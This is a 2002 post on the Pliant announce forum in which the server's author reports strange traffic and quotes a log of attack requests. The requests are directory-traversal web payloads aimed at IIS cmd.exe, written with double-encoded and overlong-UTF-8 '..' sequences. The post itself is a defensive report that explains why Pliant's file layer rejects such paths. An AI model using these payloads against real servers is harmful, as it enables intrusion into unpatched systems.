Pliant announce forum

Pliant announce forum

Pliant HTTP server under attack

I've found some strange requests sent to Pliant HTTP
server.
Message posted by hubert.tonneau on 2002/01/22 14:02:43
The traffic on http://pliant.cx/ was surprisingly high, so I've connected
to the trace, in order so see what's going on, and found strange requests
that look very much like an attack (for a Win32 server !!!).

Please notice that an URL with '..' should not be abble to cross Pliant
security since the Pliant low level file system interface should refuse
any file containing '..', just for security reason, unless the file
is specified through 'os_file:/...' instead of 'file:/...' or the option
'backward_allowed' is provided.
Also it looks safer to make your own tests.

Here is the significant part of the report:

/pliant/protocol/http/server.pli/query   GET /scripts/root.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /MSADC/root.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
/pliant/protocol/http/server.pli/query   GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0